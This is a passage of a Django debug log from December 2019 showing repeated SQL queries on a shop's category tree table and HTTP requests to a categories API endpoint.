"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:07:01,413 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:07:01,417 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:07:01,421 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:07:01,425 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:07:01,429 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:07:01,433 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:07:01] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:07:14,338 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:07:14,346 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:07:14,351 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:07:14,355 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:07:14,359 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:07:14,363 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:07:14,366 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:07:14,370 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:07:14,375 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:07:14,379 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:07:14,383 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:07:14] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:13:03,804 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:13:03,809 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:13:03,812 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:13:03,815 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:13:03,817 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:13:03,820 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:13:03,822 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:13:03,825 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:13:03,827 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:13:03,831 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:13:03,834 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:13:03] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:13:44,319 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:13:44,325 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:13:44,327 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:13:44,329 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:13:44,332 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:13:44,334 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:13:44,336 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:13:44,338 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:13:44,341 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:13:44,343 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:13:44,345 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:13:44] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:13:52] "GET / HTTP/1.0" 302 0 [13/Dec/2019 08:18:26] "GET / HTTP/1.0" 302 0 [13/Dec/2019 08:18:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:23:17,653 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:23:17,662 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:23:17,667 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:23:17,671 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:23:17,675 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:23:17,679 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:23:17,683 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:23:17,687 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:23:17,692 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:23:17,698 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:23:17,702 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:23:17] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:23:57] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:28:42,307 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:28:42,312 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:28:42,314 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:28:42,316 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:28:42,319 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:28:42,321 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:28:42,323 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:28:42,325 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:28:42,327 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:28:42,330 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:28:42,332 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:28:42] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:28:46,548 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:28:46,556 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:28:46,560 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:28:46,564 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:28:46,568 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 